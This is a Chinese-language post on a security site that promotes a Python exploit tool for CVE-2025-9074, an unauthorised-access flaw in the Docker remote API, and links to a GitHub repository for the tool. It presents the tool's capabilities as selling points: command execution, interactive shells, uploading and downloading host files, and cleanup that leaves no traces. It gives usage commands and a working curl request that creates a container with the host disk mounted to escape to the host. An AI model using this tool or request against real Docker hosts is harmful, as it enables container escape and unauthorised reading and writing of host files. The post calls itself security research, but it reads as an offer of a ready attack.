一个功能强大的 Docker 远程 API 漏洞利用工具

华盟原创文章投稿奖励计划

工具介绍

CVE-2025-9074 Docker 容器命令执行工具 ,一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。

自动草稿

核心优势

✅ 全自动容器生命周期管理:自动创建临时容器,操作完成后自动清理,不留痕迹
✅ 智能路径处理:自动识别并转换 Windows 路径为 Docker 挂载格式
✅ 全自动化操作流程:无需手动输入复杂命令,菜单式交互,一键完成文件操作
✅ 跨平台兼容:完美支持 Windows 和 Linux 系统

部分功能效果图

自动草稿

功能特性

  • 容器操作

    • 查看运行中的容器
    • 查看所有容器(包括停止的)
    • 创建新容器
    • 停止容器
    • 删除容器
    • 单次命令执行
    • 交互式终端(需要 docker 库)
  • 镜像管理

    • 查看本地镜像
    • 拉取新镜像
    • 删除镜像
  • 宿主机文件操作

    • 上传文件到宿主机
    • 从宿主机下载文件
    • 读取宿主机文件内容
    • 向宿主机写入文件
    • 自动处理 Windows Docker Desktop 路径映射

漏洞说明

CVE-2025-9074 是 Docker 远程 API 的一个安全漏洞,攻击者可以通过未授权访问 Docker API 来:

  • 执行任意命令
  • 创建容器并挂载宿主机磁盘
  • 实现容器逃逸
  • 读取/写入宿主机文件

使用方法

基本用法

直接运行脚本,使用默认 Docker API 地址:

python CVE-2025-9074-docker-exploit.py 

自定义 Docker API 地址

python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375 

命令行参数

python CVE-2025-9074-docker-exploit.py [选项]  选项:   -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375) 

功能详解

容器操作

  1. 查看运行中的容器:显示所有正在运行的容器列表
  2. 查看所有容器:显示所有容器(包括已停止的)
  3. 创建新容器:使用指定镜像创建新容器
  4. 停止容器:停止运行中的容器
  5. 删除容器:删除容器(可强制删除)
  6. 单次命令执行:在容器中执行单条命令
  7. 交互式终端:进入容器的交互式 shell(需要 docker 库)

使用交互式终端

  1. 运行脚本后选择 "1. 容器操作"
  2. 选择 "1. 查看运行中的容器"
  3. 输入容器序号选择容器
  4. 选择 "2. 交互式终端 (需要 docker 库)"
  5. 输入 shell 命令(默认: /bin/sh)
  6. 开始交互式操作

镜像管理

  1. 查看镜像:列出所有本地镜像
  2. 拉取镜像:从 Docker Hub 拉取新镜像
  3. 删除镜像:删除本地镜像

宿主机文件操作

上传文件到宿主机

1. 上传文件到宿主机 请输入本地文件路径: /path/to/local/file.txt 请输入宿主机目标目录: D:/temp 请输入目标文件名 (留空则使用原文件名):  

从宿主机下载文件

2. 从宿主机下载文件 请输入宿主机文件路径: D:/temp/file.txt 请输入本地保存路径: /tmp 

读取宿主机文件内容

3. 读取宿主机文件内容 请输入宿主机文件路径: D:/temp/file.txt 

向宿主机写入文件

4. 向宿主机写入文件 请输入宿主机目标目录: D:/temp 请输入文件内容: Hello, World! 

Windows Docker Desktop 路径映射

本工具自动处理 Windows Docker Desktop 的路径映射:

Windows 路径 Docker 挂载路径
D:\ /mnt/host/d
D:\temp /mnt/host/d/temp
C:\Windows /mnt/host/c/Windows
C:\Users\test /mnt/host/c/Users/test

支持的输入格式:

  • D:\ 或 D:/
  • D:\temp 或 D:/temp
  • "D:\file.txt"(带引号)
  • 'D:/file.txt'(带引号)

技术原理

容器逃逸

通过 Docker API 创建容器并挂载宿主机磁盘:

curl -X POST "http://<target>:2375/containers/create" \   -H "Content-Type: application/json" \   -d '{     "Image": "python:3.11.7",     "Cmd": ["sleep", "999d"],     "HostConfig": {       "Binds": ["/mnt/host/d:/tmp"]     },     "Tty": true   }' 

文件读写

通过在容器中执行命令来读写宿主机文件:

# 写入文件 echo "content" > /tmp/file.txt  # 读取文件 cat /tmp/file.txt

工具获取

https://github.com/Shaoshi17/CVE-2025-9074-Docker-Exploit

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/download/348111.html

发表回复